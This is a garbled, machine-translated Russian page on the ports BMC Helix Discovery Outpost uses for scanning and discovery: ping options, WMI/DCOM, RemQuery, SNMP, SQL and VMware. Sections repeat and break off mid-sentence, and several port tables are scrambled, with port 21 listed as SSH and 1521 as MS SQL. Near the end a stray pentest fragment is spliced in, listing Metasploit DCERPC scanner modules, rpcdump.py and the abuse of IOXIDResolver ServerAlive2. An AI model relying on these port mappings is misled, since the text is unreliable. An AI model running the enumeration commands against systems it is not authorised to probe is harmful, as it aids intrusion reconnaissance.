Для повышения эффективности BMC Helix Discovery Outpost использует эхо-запрос ICMP для обнаружения устройства.Если в вашей среде подавляется эхо-запрос ICMP, можно использовать другие методы проверки связи. Для этого на вкладке Administration прокрутите вниз до раздела Discovery и нажмите Discovery Configuration . В разделе «Сканирование» включите Использовать TCP ACK «ping» перед сканированием. и Использовать TCP SYN «ping» перед сканированием флажков и введите номера портов в TCP-портах, которые будут использоваться для начального сканирования, и UDP-порты для использования. для полей начального сканирования.
Если вы не разрешите пинги ICMP через брандмауэр и не включите TCP Ack и Synpings, вы можете потерять производительность.Это связано с тем, что система выполняет полное сканирование порта nmap «методом доступа», чтобы определить, присутствует ли хост на самом деле, что вызывает задержки, поскольку он ожидает запросов до тайм-аута. В этой ситуации вы должны изменить параметр «Пинговать хосты перед сканированием» на «Нет». Если существует ограниченный диапазон IP-адресов, для которых подавлено эхо-запрос ICMP, вы можете отключить поведение ping для этих IP-адресов с помощью параметра «Исключить диапазоны из ping». Дополнительные сведения см. В разделе Настройка параметров обнаружения. Для сканирования сетей, которые не разрешают пинг-пакеты ICMP, вы можете установить Использовать пинг TCP ACK перед сканированием или Использовать пинг TCP SYN перед сканированием (или обоих) в настройках обнаружения на Да .Если BMC Helix Discovery пингует IP-адрес, на котором нет устройства, и какой-то брандмауэр в вашей среде настроен для ответа на этот IP-адрес, это может привести к отправке сообщения об устройстве, которого нет в сети, а не о темном пространстве (NoResponse). Чтобы избежать этого, рекомендуется либо изменить такие конфигурации брандмауэра, либо не включать пинг TCP ACK или пинг TCP SYN.
Если BMC Helix Discovery не может подключиться к конечной точке, он использует эвристические методы для оценки присутствующего устройства.Этим можно управлять с помощью параметров в разделе «Настройка параметров обнаружения».
Порт 4, использующий TCP и UDP, необходим при использовании IP Fingerprinting, поскольку обнаружение должно отслеживать ответ от гарантированно закрытого порта на конечной точке.
Порт 4 должен быть закрыт на цели обнаружения, но должен быть открыт на любом межсетевом экране между устройством и целью обнаружения, чтобы ответ был от цели, а не от межсетевого экрана. Если это не так, эвристика получает ответ от двух разных стеков TCP / IP, что приводит к непредсказуемым результатам, включая классификацию конечной точки как брандмауэра или нераспознанного устройства.Это может привести к пропуску устройств (см. UnsupportedDevice на странице DiscoveryAccess).
Порты, перечисленные в следующей таблице, используются для определения присутствующего устройства.
Номер порта
Назначение порта
4
Закрытый порт
21
21
SSH
23
telnet
80
HTTP
Windows 135
PC 443 HTTPS 513
rlogin
902 VMware Authentication Daemon 5988 WBEM HTTP 5989 WBEM HTTPS
Порты SNMP, используемые для обнаружения
Единственный порт, необходимый для обнаружения SNMP, — это 161 UDP.
Порты UNIX, используемые для обнаружения
Минимальный порт, необходимый для успешного обнаружения UNIX, — это просто порт, связанный с используемыми вами методами доступа. Например, если вы используете только ssh, это будет порт 22. В следующей таблице подробно описаны назначения для каждого номера порта.
Номер порта
Назначение порта
22
SSH
23
8 8
Порты Windows, используемые для обнаружения
В этом разделе описаны порты, которые BMC Discovery Outpost использует при обнаружении удаленных целей Windows.Если вы намереваетесь обнаруживать хосты за брандмауэром, вы должны открыть эти порты в брандмауэре. Указанные порты являются исходящими (от прокси-сервера Windows и устройства) TCP-портами. Цели Windows и порт 135 Устройство сканирует порт 135, чтобы определить, открыт ли порт. Если порт 135 открыт, целью, скорее всего, будет хост Windows, и дальнейшее обнаружение выполняется с помощью прокси-сервера Windows. Вы можете отключить сканирование порта 135. Если вы это сделаете, BMC Helix Discovery предполагает, что все цели являются хостами Windows.Узел UNIX сканируется безуспешно с помощью прокси-сервера Windows до того, как будут применены какие-либо методы доступа UNIX. Чтобы отключить сканирование порта 135:
- Выберите Администрирование> Обнаружение> Конфигурация обнаружения .
- Выберите Нет в Проверьте порт 135 перед использованием методов доступа Windows Поле .
WMI
Все сообщения WMI от BMC Helix Discovery отправляются с включенной конфиденциальностью пакетов. Если обнаруживаемый узел не поддерживает конфиденциальность пакетов, флаг игнорируется, и WMI возвращает запрошенную информацию (например, если вы используете более раннюю версию, чем Windows Server 2003 с пакетом обновления 1 (SP1)).В случаях, когда указан диапазон, один из портов используется после первоначального согласования.
По умолчанию WMI (DCOM) использует случайно выбранный порт TCP между 1024 и 65535. Чтобы упростить настройку брандмауэра, следует ограничить это использование при сканировании через брандмауэры. Для получения дополнительной информации см. Настройку диапазона порта DCOM.
Порты, используемые методами обнаружения WMI, и соответствующие назначенные порты описаны в следующей таблице.
Номер порта
Назначение порта
135
DCE RPC
DCE RPC Endpoint Manager1
DCOM Service Control
DCOM с ограниченным доступом 49152-65535
Неограниченный DCOM
139
Netbios Session Service
Netbios Session Service
Netbios Session Service
Домены в стиле Windows NT4 и NT4 (WMI)
TCP 139 требуется вместо TCP 445, если вы обнаружите NT4 или аутентифицируетесь в домене NT4, отличном от AD (например, в домене, запущенном с использованием Samba 3. x или более ранней версии).
TCP 139 — это служба сеансов NetBIOS. Некоторые версии Windows (особенно 9x / NT4) запускают SMB в NetBIOS через TCP, используя порт 139. В более новых версиях по умолчанию SMB запускается непосредственно через TCP через порт 445. Windows XP / 2003 / Vista / 2008 и более поздние версии и сети Active Directory используют SMB напрямую через TCP 445.
Запросы WMI от Windows Server 2008 к хосту Windows NT4 завершаются ошибкой при использовании настроек безопасности по умолчанию. На прокси-узле Windows отключите требование 128-битной безопасности в политике Network security: Minimum session security for NTLM SSP (включая RPC) для клиентов, чтобы это разрешить.
Диапазон портов DCOM
WMI основан на объектной модели распределенных компонентов (DCOM), которая по умолчанию использует для связи случайно выбранный порт TCP от 1024 до 65535. Чтобы сделать это более эффективным для брандмауэров, диапазон можно ограничить, используя следующую процедуру на каждом целевом хосте. Дополнительные сведения об этой проблеме см. В разделе Как настроить динамическое выделение портов RPC для работы с брандмауэрами.
Эти настройки должны быть ограничены на целевом хосте, а не на хосте BMC Helix Outpost.
Чтобы установить диапазон порта DCOM:.
- С помощью редактора реестра создайте раздел
HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Rpc \ Internet - Внутри этого раздела создайте
REG_MULTI_SZ (многострочное значение) с именем Ports. - Укажите порт или диапазон портов для использования.
Прокси-сервер Windows использует только один порт. Однако, если у пользователя есть другие приложения DCOM, используемые на этом компьютере, вам может потребоваться включить больший диапазон. - Создайте
REG_SZ (строковое значение) с именем PortsInternetAvailable и присвойте ему значение Y . - Создайте
REG_SZ (строковое значение) с именем UseInternetPorts и присвойте ему значение Y . - Перезагрузите компьютер.
RemQuery
Хотя WMI является стандартным механизмом для удаленного опроса системы и управления ею от Microsoft. Однако некоторые операции с помощью WMI невозможны. В первую очередь данные netstat при обнаружении ядра и выполнении любых дополнительных команд или извлечении содержимого файла с помощью шаблонов. Без RemQuery невозможно определить информацию о сетевом подключении для цели обнаружения, обмен данными между этим хостом и другими, а также моделирование приложений на основе сетевых подключений.Дополнительные операции обнаружения с использованием RemQuery обычно предназначены для более глубокого обнаружения, моделирования и управления версиями программного обеспечения.
RemQuery — это служебная программа BMC Helix Discovery, использующая тот же базовый подход, что и инструмент Microsoft PSExec. Прокси-сервер копирует исполняемый файл RemQuery в общий ресурс ADMIN $ на целевом компьютере. Доступ администратора Windows необходим для записи в общий ресурс ADMIN $ и запуска службы RemQuery. После запуска службы на целевом сервере прокси-сервер отправляет свой открытый ключ службе RemQuery, которая генерирует ключ шифрования, шифрует его полученным открытым ключом и затем отправляет обратно.Затем прокси восстанавливает ключ шифрования, используя свой закрытый ключ. С этого момента вся связь через прокси-сервер с RemQuery будет защищена с помощью ключа шифрования и соответствующего алгоритма, в зависимости от целевой системы. Обнаружение RemQuery использует шифрование AES с 256-битным ключом. AES не поддерживается в Windows 2000, поэтому обнаружение RemQuery возвращается к шифрованию DES. Windows NT не поддерживает AES или DES, поэтому обнаружение RemQuery не зашифровано. Прокси-сервер связывается со службой RemQuery с помощью именованного канала.Этот канал защищен, поэтому к нему может получить доступ только администратор.
Порты, используемые при обнаружении RemQuery, и соответствующие назначения портов описаны в следующей таблице.
Номер порта
Назначение порта
139
Netbios Session Service
Netbios Session Service
Служба сессий Microsoft
Домены в стиле Windows NT4 и NT4 (RemQuery)
TCP 139 требуется вместо TCP 445, если вы обнаружите NT4 или аутентифицируетесь в домене NT4, отличном от AD, например, в домене, запущенном с использованием Samba 3.x или более ранней версии.
TCP 139 — это служба сеансов NetBIOS. Некоторые версии Windows (особенно 9x / NT4) запускают SMB в NetBIOS через TCP, используя порт 139. В более новых версиях по умолчанию SMB запускается непосредственно через TCP через порт 445. Windows XP / 2003 / Vista / 2008 и более поздние версии и сети Active Directory используют SMB напрямую через TCP 445.
Порты мэйнфрейма, используемые для обнаружения
Единственный порт, необходимый для обнаружения мэйнфрейма, — это 3940 TCP. Дополнительные сведения о настройке этого порта см. В разделе Конфигурация обнаружения.
Порты WBEM, используемые для обнаружения
Порты по умолчанию, используемые для обнаружения WBEM, описаны в следующей таблице. Дополнительные сведения о настройке этого порта см. В разделе Конфигурация обнаружения.
Номер порта
Назначение порта
5988
HTTP
5989 HTT В следующих разделах содержится подробная информация о портах для расширенных типов обнаружения.
Обнаружение SQL
Информация о порте, используемая для обнаружения SQL, получена из шаблонов, используемых для обнаружения конкретной базы данных. Это зависит от способа настройки баз данных в вашей организации. В следующей таблице приведены порты по умолчанию.
Номер порта
Назначение порта
Использование
1521
1521
SQL
MS SQL
4100
SQL
Sybase ASE
3306
3306
3306
2 Обнаружение VMware ESX / ESXi с помощью vCenter
Порты, необходимые для обнаружения хостов VMware ESX / ESXi с помощью vCenter, перечислены в следующей таблице.
Обнаружение vCenter
Обнаружение vCenter использует стандартное обнаружение хоста с созданием vCenter SI, запускаемого на обнаруженном процессе vCenter.
Номер порта
Назначение порта
Использовать
443
443
443
HTware
Обнаружение VMware ESX / ESXi с помощью vSphere
Порты, необходимые для обнаружения хостов VMware ESX / ESXi, перечислены в следующей таблице.
Номер порта
Назначение порта
Использовать
443
HTTPS
HTTPS
HTTPS
VMware vSphere API
VMware ESX / ESXi
.
ncacn_ip_tcp и ncadg_ip_udp (TCP и UDP-порт 135)
ncacn_np через именованный канал \ epmapper SMB)
ncacn_http (RPC через HTTP через TCP-порт 80, 593 и другие)
использовать вспомогательный / scanner / dcerpc / endpoint_mapper
использовать вспомогательный / сканер / dcerpc / скрытый вспомогательный
/ dcerpc / management
используйте вспомогательный / scanner / dcerpc / tcp_dcerpc_auditor
rpcdump.
py
tcp_dcerpc_auditor могут быть выполнены только для против порт 135 . 
com/mubix/IOXIDResolver, из исследования Airbus, возможно злоупотребление методом ServerAlive2 внутри интерфейса IOXIDResolver .
В то время как протокол IP имеет дело только с пакетами, TCP позволяет двум хостам устанавливать соединение и обмениваться потоками данных.TCP гарантирует доставку данных, а также гарантирует, что пакеты будут доставлены через порт 135 в том же порядке, в котором они были отправлены. Гарантированная связь через порт 135 — ключевое различие между TCP и UDP. UDP-порт 135 не может гарантировать связь таким же образом, как TCP.В этом разделе описывается связь между BMC Helix Discovery Outpost и целями обнаружения.
Он содержит следующие разделы: 
В этой ситуации вы должны изменить параметр «Пинговать хосты перед сканированием» на «Нет». Если существует ограниченный диапазон IP-адресов, для которых подавлено эхо-запрос ICMP, вы можете отключить поведение ping для этих IP-адресов с помощью параметра «Исключить диапазоны из ping». Дополнительные сведения см. В разделе Настройка параметров обнаружения.
Номер порта
Назначение порта
4
Закрытый порт
21
21
SSH
23
telnet
80
HTTP
Windows 135
513
rlogin
Например, если вы используете только ssh, это будет порт 22. В следующей таблице подробно описаны назначения для каждого номера порта.Номер порта
Назначение порта
22
SSH
23
Если вы это сделаете, BMC Helix Discovery предполагает, что все цели являются хостами Windows.Узел UNIX сканируется безуспешно с помощью прокси-сервера Windows до того, как будут применены какие-либо методы доступа UNIX. Чтобы отключить сканирование порта 135:
Чтобы упростить настройку брандмауэра, следует ограничить это использование при сканировании через брандмауэры. Для получения дополнительной информации см. Настройку диапазона порта DCOM.Номер порта
Назначение порта
135
DCE RPC
DCE RPC Endpoint Manager1
DCOM Service Control
49152-65535
Неограниченный DCOM
139
Netbios Session Service
Netbios Session Service
Netbios Session Service
x или более ранней версии).Чтобы установить диапазон порта DCOM:.
HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Rpc \ Internet REG_MULTI_SZ (многострочное значение) с именем Ports.Прокси-сервер Windows использует только один порт. Однако, если у пользователя есть другие приложения DCOM, используемые на этом компьютере, вам может потребоваться включить больший диапазон.
REG_SZ (строковое значение) с именем PortsInternetAvailable и присвойте ему значение Y . REG_SZ (строковое значение) с именем UseInternetPorts и присвойте ему значение Y .Номер порта
Назначение порта
139
Netbios Session Service
Netbios Session Service
Служба сессий Microsoft
Номер порта
Назначение порта
5988
HTTP
HTT В следующих разделах содержится подробная информация о портах для расширенных типов обнаружения.
Обнаружение SQL
Информация о порте, используемая для обнаружения SQL, получена из шаблонов, используемых для обнаружения конкретной базы данных. Это зависит от способа настройки баз данных в вашей организации. В следующей таблице приведены порты по умолчанию.
Номер порта | Назначение порта | Использование | ||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1521 | 1521 | SQL | MS SQL | |||||||||||||
4100 | SQL | Sybase ASE | ||||||||||||||
3306 | ||||||||||||||||
3306 | ||||||||||||||||
3306 2 Обнаружение VMware ESX / ESXi с помощью vCenterПорты, необходимые для обнаружения хостов VMware ESX / ESXi с помощью vCenter, перечислены в следующей таблице. Обнаружение vCenter Обнаружение vCenter использует стандартное обнаружение хоста с созданием vCenter SI, запускаемого на обнаруженном процессе vCenter.
Обнаружение VMware ESX / ESXi с помощью vSphereПорты, необходимые для обнаружения хостов VMware ESX / ESXi, перечислены в следующей таблице.
|